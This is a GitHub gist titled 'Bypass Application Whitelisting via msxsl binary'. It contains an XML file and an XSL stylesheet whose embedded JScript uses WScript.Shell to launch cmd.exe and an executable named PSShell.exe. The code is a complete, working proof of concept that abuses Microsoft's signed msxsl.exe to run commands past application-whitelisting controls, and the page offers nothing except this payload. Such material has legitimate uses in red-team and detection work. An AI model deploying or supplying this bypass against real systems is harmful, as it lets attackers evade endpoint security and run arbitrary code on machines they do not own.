Skip to content

Instantly share code, notes, and snippets.

@netbiosX
Created July 5, 2017 20:29
Show Gist options
  • Save netbiosX/5d3ac4cef1bcdf2691a3e7f7d4513e93 to your computer and use it in GitHub Desktop.
Save netbiosX/5d3ac4cef1bcdf2691a3e7f7d4513e93 to your computer and use it in GitHub Desktop.
Bypass Application Whitelisting via msxsl binary
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="script.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>
<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<msxsl:script language="JScript" implements-prefix="user">
function xml(nodelist) {
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /k C:\\PSShell.exe");
return nodelist.nextNode().xml;
}
</msxsl:script>
<xsl:template match="/">
<xsl:value-of select="user:xml(.)"/>
</xsl:template>
</xsl:stylesheet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment